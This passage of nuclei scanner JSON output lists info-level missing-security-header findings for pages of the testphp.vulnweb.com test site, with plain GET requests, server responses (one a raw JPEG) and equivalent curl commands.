'http://testphp.vulnweb.com/login'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:05.456640598Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/hpp\",\"path\":\"/hpp\",\"matched-at\":\"http://testphp.vulnweb.com/hpp/\",\"request\":\"GET /hpp HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:40 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003ctitle\\u003eHTTP Parameter Pollution Example\\u003c/title\\u003e\\r\\n\\r\\n\\u003ca href=\\\"?pp=12\\\"\\u003echeck\\u003c/a\\u003e\\u003cbr/\\u003e\\r\\n\\r\\n\\u003chr\\u003e\\r\\n\\u003ca href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'\\u003eOriginal article\\u003c/a\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:05.871878582Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50' 'http://testphp.vulnweb.com/hpp'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:05.871936196Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"path\":\"/pictures/1.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"request\":\"GET /pictures/1.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4355\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-1103\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001b\\u0000\\u0000\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0001\\u0005\\u0003\\u0004\\u0007\\u0002\\ufffd\\ufffd\\u00004\\u0010\\u0000\\u0002\\u0001\\u0003\\u0004\\u0001\\u0003\\u0003\\u0003\\u0003\\u0004\\u0001\\u0005\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!1A\\u0006\\u0013Q\\\"a\\ufffd\\u0014q\\ufffd2\\ufffd\\ufffd#BR\\ufffd\\ufffd\\u0016b\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0019\\u0001\\u0000\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0005\\ufffd\\ufffd\\u0000)\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0002\\u0005\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004!1\\u0012A\\u0005\\u0013Q\\ufffd\\ufffd2aq\\ufffd\\\"3\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\u003e\\ufffd\\ufffdn?\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8ԝB\\ufffdw\\u0018Va\\ufffd9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd.\\ufffdH\\ufffdn\\t \\ufffd\\ufffdr2s\\ufffd\\u0006\\ufffd\\ufffdP\\u0003z\\ufffd\\ufffd8\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0006$}#\\ufffd\\ufffd\\ufffd\\ufffdW\\t\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffd\\ufffdc ʸʮ\\u003c\\ufffd\\ufffd\\ufffd\\ufffd׹Er\\ufffd\\n/\\ufffdI\\ufffd\\ufffd\\ufffdj\\ufffd\\u0026\\ufffd\\ufffd\\ufffddY\\u0019@\\ufffdW\\ufffd\\ufffd#\\ufffdr\\u003e\\ufffdϚ\\ufffd\\ufffdlN^}\\ufffd\\u0015\\ufffd#3(|g\\ufffdp0rpO\\ufffd\\ufffdf\\ufffd\\ufffd}%%\\ufffd\\u0006kIE\\ufffdf\\ufffd\\u0010\\ufffd\\u0003\\ufffd\\ufffd\\u0007\\u001f\\ufffd\\ufffd\\u0006\\ufffdzf\\ufffd\\ufffd^\\ufffdC%Ƕ\\ufffd\\u0019\\u00140;C\\u001d\\ufffd\\u0018\\ufffd?\\ufffd\\ufffd\\ufffdz\\ufffd\\\\\\\\[\\ufffd\\ufffd\\u00025\\ufffdy.\\\\\\ufffd\\u00169۟\\ufffd8\\u001fڮ\\ufffd?\\ufffd\\u0019L3\\\\\\ufffd\\ufffd\\ufffd\\u0019#\\u00110\\ufffd\\\\x\\ufffd\\ufffd8\\ufffd#\\ufffd\\u001b\\ufffdZ\\u0015Ʃ|\\ufffd\\u001e5 夑\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdդ\\ufffd=\\u003e\\ufffd\\u001bI\\ufffdi\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n2\\u0006\\u0007۳\\ufffdO^(\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffdP\\ufffd.\\ufffd\\ufffd_fEUR\\u0002}9\\ufffd\\ufffdr6\\ufffd\\ufffd\\ufffd\\ufffd\\u003ej\\ufffdg\\ufffd$g\\ufffd\\u0017$\\ufffd\\u000e\\ufffd{\\ufffd\\ufffd[\\ufffdL\\ufffd\\ufffd\\ufffd9\\ufffd,sXi\\u0026\\u0014y\\ufffd\\ufffd\\ufffdT\\ufffdb*E\\u0014VH\\ufffd\\ufffd퍌\\ufffdI,\\ufffd\\ufffd\\ufffdE\\ufffd\\ufffd0\\u0007\\u0007\\ufffd\\ufffd\\ufffd?\\ufffd\\u0015\\ufffd;\\ufffd\\ufffd\\u0017]\\ufffdJ\\ufffdX\\ufffd\\ufffdFd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$`c\\ufffd\\ufffd2\\ufffd0գ\\ufffd7\\u0016\\ufffdnח\\\"ј;2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdp;'9\\u0018\\ufffdz\\ufffd\\u0014\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd[)\\ufffd3Z\\ufffdorEY\\u000c\\ufffd\\u001e|\\u0011\\ufffdq\\ufffd|\\u001e\\ufffd\\ufffda\\u001e\\ufffdu$-\\u000bJ\\ufffd\\u001f;\\ufffd\\ufffd\\u0000p\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffdT\\ufffd\\ufffd\\ufffd\\\"\\ufffdM\\ufffd\\ufffd1\\ufffd06\\ufffdۉ\\u0001O\\u0000\\ufffdg\\u001c\\ufffd\\ufffd\\ufffdN\\ufffd\\u003e\\ufffd\\ufffd\\ufffd\\ufffd,\\ufffd]\\ufffd%ܰ\\ufffd\\ufffdH\\u0010s\\ufffdO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015S\\ufffdz\\ufffdi\\ufffd%\\ufffd@\\ufffd\\ufffd@G\\ufffd\\u0007`,@#'\\ufffdC\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffdl\\u0004\\ufffdX\\ufffdX\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd.\\u0014\\ufffdA\\ufffdU\\ufffd\\\\6i\\nٱ\\ufffd\\ufffd-~\\\"2ƂDP\\ufffd\\ufffd`\\ufffd\\u0000\\u0003\\ufffd\\u0001\\ufffd\\ufffdV׿\\u0015\\u0014$\\ufffdm\\ufffd\\ufffdIsr\\ufffd0Uf\\ufffd\\ufffd\\u0014\\u0003\\ufffd\\ufffd.\\ufffdsq\\ufffd\\ufffd\\ufffdg\\ufffd\\ufffd\\ufffd]\\ufffd8\\u001fj\\ufffd\\u0006\\ufffd\\ufffdb\\ufffd/,\\ufffd\\u001e\\ufffd\\ufffd]B\\u0015\\\"\\ufffd\\ufffd\\nS\\ufffdp\\ufffd\\ufffd\\u003e3\\ufffd\\u0000\\\\S\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd6\\ufffdRI[\\u000258\\ufffd\\ufffd\\u0000\\u000b\\ufffd;\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003cbDxAiJ\\ufffd\\u0026\\ufffdn8\\u000b\\ufffd\\u0007\\ufffd\\ufffd\\ufffd' f\\ufffd\\ufffdC\\ufffd\\ufffd\\ufffd\\ufffd,jR\\u0018\\ufffd\\u0015Oǎ\\u0007\\u0003\\ufffd:\\ufffd\\ufffd\\ufffd+\\u001fO\\ufffdb\\ufffd\\ufffd\\u0017z\\ufffd\\ufffdF\\u0014\\ufffd\\u000bI\\u0003,b1\\ufffdS#$\\u00022\\t\\ufffd3\\ufffdq\\ufffd\\ufffd ^\\u0016$\\ufffd'\\ufffd\\ufffd\\u001e\\ufffdԭ\\ufffd-೾\\ufffdi\\ufffd\\ufffd\\ufffd*\\ufffd\\ufffd\\u0013g\\u00039##\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd?L\\ufffdH\\ufffd\\u0000D\\ufffd\\ufffdO\\ufffdIw\\ufffd\\u0000S}D\\ufffd\\ufffd\\u0000\\r\\ufffdpz\\ufffd\\ufffd\\u0010\\ufffdA\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\u001a\\ufffda\\ufffdto\\ufffd^\\ufffd\\ufffd\\ufffdv\\ufffd~\\ufffd1\\ufffd\\ufffd\\u0000\\ufffd\\u003c\\ufffd\\u000f\\ufffdU\\\\Zl\\ufffdh\\ufffd%\\ufffd\\u001e񊫊o\\u00004\\ufffd暮\\ufffdKD\\ufffd\\ufffdS\\ufffd\\ufffda\\ufffd,\\ufffd\\\"\\ufffdr\\\\\\u0004\\u001f\\ufffdT\\u001f\\u003c\\u000c\\ufffd\\ufffd\\ufffd\\u001aV\\ufffdK\\ufffd\\ufffd'\\ufffd*qEn\\ufffd\\u0000\\ufffd\\u0014b\\ufffd\\ufffd(\\ufffdՎ\\u000c\\ufffd\\u0018\\ufffd3\\ufffdg\\u0015Ҵ\\ufffd\\u001d,\\\\$\\ufffdE\\ufffd\\ufffd\\ufffd}\\ufffd\\ufffd\\u00021\\ufffdO\\u001d\\ufffdۏ\\ufffd\\ufffd\\ufffd\\u0004]'G\\ufffd\\ufffd\\ufffd\\ufffdx!wH\\ufffd\\u0007j\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\u0004wz\\\\x\\u0018B\\ufffd\\ufffd\\ufffd\\u0014dy\\ufffd\\ufffdG\\ufffd\\ufffd-\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\u003eL\\ufffdMR\\ufffd!\\ufffd\\ufffd\\ufffdKh\\ufffd$\\u0026]\\ufffdI\\ufffd\\u0002\\n\\ufffds\\ufffd\\ufffd?ǐ+\\ufffdkz5\\ufffd\\ufffd\\ufffd\\ufffd=\\ufffdR\\ufffd\\u0007!b\\ufffdNJ\\ufffd\\u001b\\ufffd\\u001dq\\ufffds\\ufffd8\\u00184\\ufffdt\\ufffdm\\ufffd\\ufffd\\ufffd\\u00067\\ufffdwb\\ufffd\\t`\\ufffd\\ufffd\\ufffd{\\u0001\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd\\ufffd\\u001e\\ufffd\\ufffd\\u000f\\ufffd9\\ufffd,c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd$\\u0003\\ufffd\\u001dW.\\ufffdR\\ufffd\\nO+\\ufffd\\ufffd4\\ufffd\\u0017\\u0008\\ufffd\\ufffd\\u0018\\ufffdr.\\rx\\ufffd\\ufffd\\ufffd!\\u0014\\ufffd\\u0000;=U\\ufffdiw6:\\ufffd\\ufffdȻ\\ufffd\\u0019L{\\ufffdK#\\u0010q\\ufffd\\ufffd`\\ufffd:6\\u000eFA\\u001eE8zwVKM6In\\ufffdnj2\\ufffd]Ý\\ufffd\\ufffd\\ufffdDn8\\u0000\\ufffd\\u003eOc5\\u0018K`\\ufffd:\\ufffd\\ufffdv\\ufffd|Q\\ufffd^\\u0018/\\u00034\\ufffd$\\n\\u0000\\ufffd\\u0007\\u0005\\ufffd\\u000c\\u001bpny\\ufffd\\u003c\\u001a痷r\\\\\\\\\\u003c\\ufffd9wc\\ufffd\\ufffd\\u0026\\ufffdk[\\ufffd\\ufffd\\u0006Q\\\"\\ufffdޥ\\\\0\\ufffd\\ufffdu\\ufffd\\ufffd\\u001e\\u0008\\ufffdWf\\ufffd\\u001cD\\u0005\\ufffd\\ufffd\\ufffdOep\\ufffd[?\\ufffd(\\ufffd\\ufffd\\ufffd~\\ufffd\\ufffd\\ufffd\\ufffdyđ\\ufffdwl\\ufffdVf6\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd?\\ufffds\\ufffd\\ufffd\\ufffd)\\u0017LA-\\ufffd1\\ufffd\\u003c\\ufffd\\ufffd\\u0026\\ufffd\\ufffd\\u0019\\ufffd\\ufffd\\u0001\\ufffd\\ufffd8ìZ\\ufffd@\\ufffd~\\ufffd\\u000c\\ufffd!̲\\ufffdk\\ufffd\\ufffd\\ufffd/dp{㓎\\ufffd\\t\\ufffd\\u0000%\\ufffd\\ufffda\\ufffd\\u001d6\\u001d2\\ufffd\\ufffd\\ufffd0̒\\ufffd\\ufffdG\\u0004\\ufffd\\ufffdC\\u0002\\u0001\\ufffd \\ufffd\\u003e|\\ufffd\\ufffdt\\ufffd:E\\ufffd\\ufffdQ\\ufffd\\u000b\\u001a\\ufffd\\ufffd\\ufffd6\\ufffdL\\u000c\\ufffd$\\ufffd\\u0007\\u0007\\ufffdy\\ufffd)\\ufffdH\\ufffd\\ufffd\\ufffd{\\u0010\\ufffdH6)\\ufffd\\u000fy\\u0004\\ufffd`\\ufffd)\\u0003h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffdr(\\ufffd#\\ufffd\\ufffd\\ufffdRA)\\ufffd\\u001cřd\\ufffd\\ufffd\\ufffdo\\u0001p\\u0000-\\ufffd\\u003c\\ufffd\\ufffdx.\\ufffd\\ufffdO\\u000c\\ufffde\\ufffd\\ufffd\\ufffd(\\ufffd/z\\ufffd\\ufffdؘ\\ufffd\\ufffdwq\\u000e\\\"\\ufffd\\ufffd\\ufffdF\\u0006\\u003e\\ufffd\\ufffd|\\ufffdr\\t\\u0002\\ufffd\\ufffd4\\ufffd\\ufffdO\\ufffd\\ufffdsfR~\\ufffd]\\ufffdt\\u0008\\ufffd\\ufffd?a\\ufffd\\ufffd:w\\ufffd4x\\ufffd.\\u000c\\ufffd\\ufffd\\ufffd!V}\\ufffd˲\\ufffd\\ufffd;\\u001c\\ufffd\\ufffd\\u0006G\\u001d\\u000e\\ufffdk\\u0016\\ufffd\\ufffd\\ufffdjV\\ufffd]\\ufffdJZ(\\ufffd%L\\ufffd\\u0001\\t\\ufffdr\\u003ca8\\ufffd?\\ufffdB\\ufffd\\ufffd+\\ufffdㇷs4\\ufffd i~\\ufffd7\\ufffdt\\ufffd\\ufffd\\ufffdd\\u0019\\u0018\\ufffd\\u0008\\ufffdx+\\ufffd'\\u0019?P\\ufffd\\ufffd\\u001e2E%ݻ[L\\ufffd9R\\ufffd\\ufffdӑ\\ufffd\\u003ez|\\ufffd5\\u000bq\\ufffd\\u000bKkt@[q+\\ufffd\\u000e\\ufffd\\u0004\\u0003\\ufffd􁜌\\ufffd\\ufffdy4\\ufffd:\\u0016bO\\u0026\\ufffdknK,ViԨɬ\\ufffd\\u003ez5\\ufffdS\\ufffd)\\ufffd\\u0002\\ufffd@\\ufffd\\ufffd\\ufffdX㳑\\ufffd\\t\\u0016P\\ufffd\\u0007,\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\ufffdM\\ufffd庂\\ufffd\\u0026\\ufffd$\\ufffd\\t\\ufffdr\\u0007A\\ufffd\\u0012r8\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdS\\ufffd\\\\Igw\\u0015\\ufffd\\r\\ufffdH\\ufffd\\ufffd8\\ufffd4æIst\\ufffd\\u000f#\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\u0007\\ufffd\\ufffd+\\ufffd\\ufffdU\\ufffd\\ufffd/^\\ufffd'\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd'\\ufffdh\\u001c\\ufffd\\u0019\\ufffdX\\ufffd\\ufffdH'\\ufffdv9\\ufffd`\\ufffdx\\ufffd\\r^oOI,m\\u0014L\\ufffd\\ufffd\\ufffdu\\u000b\\ufffd-\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\u0018,:\\ufffd\\ufffdjz}\\ufffd\\u0007\\ufffd)\\u0019\\ufffd\\u001aC\\ufffd\\u0002O\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffdƥo4A^DuG\\ufffd\\ufffd*@lw\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\te\\ufffdm\\ufffd\\ufffd2e\\u001d\\ufffd\\ufffdf#\\u001d\\ufffd\\ufffdj\\ufffd\\u0019\\ufffd\\u0015\\ufffd*\\ufffd\\ufffd\\ufffd#\\u0019\\ufffd\\u001a\\ufffd\\u0004+\\ufffdYZy\\u001a\\u0015\\ufffd\\ufffd1\\ufffd$)\\u003c\\u0003\\ufffd\\ufffd5\\\"\\ufffdc\\u0026\\ufffd'4f\\ufffd4S\\ufffd\\u0000\\ufffdk=\\ufffd\\ufffdo4r\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\u0008\\ufffd\\ufffdׯJpj\\ufffd\\ufffd\\u0006\\ufffdL\\ufffdw\\ufffd\\u0007\\ufffde0\\ufffd\\ufffdVy\\u0002`g\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffdV\\ufffd\\ufffd,\\ufffd\\ufffd7\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\u0015=tx\\ufffd\\ufffdiV\\ufffdRM\\u003e\\ufffd$Aj\\ufffd\\ufffdG\\ufffdI!\\ufffd\\u0010U\\ufffd…\\u0003\\u0019\\ufffd$\\u001e\\ufffd\\ufffd\\ufffd*\\ufffdmF{۝\\ufffd;I+vO%\\ufffd\\ufffd\\ufffd4\\ufffd\\ufffd6y\\ufffd\\u0008\\u003c\\u000f\\ufffd\\ufffd\\ufffd\\ufffdԯ\\ufffd!\\ufffdb\\ufffd$\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd?\\ufffd\\ufffd\\ufffdU\\ufffdKo\\ufffd\\ufffdq\\ufffd\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\u0016f\\\\*㑜\\u0001\\ufffd\\ufffd\\ufffdI\\ufffd4\\ufffd\\ufffdi\\ufffd\\ufffdIyܤQ\\ufffd\\ufffdҾ\\ufffd\\ufffdX`\\u0005’A\\ufffd'\\u0004`.y\\ufffd\\ufffd/\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffd6\\ufffd\\ufffd\\u001f\\ufffdg\\u0008\\ufffd\\ufffd4i-\\ufffdz:\\ufffd\\u0011gP\\ufffd\\ufffdQ\\ufffd0\\ufffd\\u0011\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffddG[\\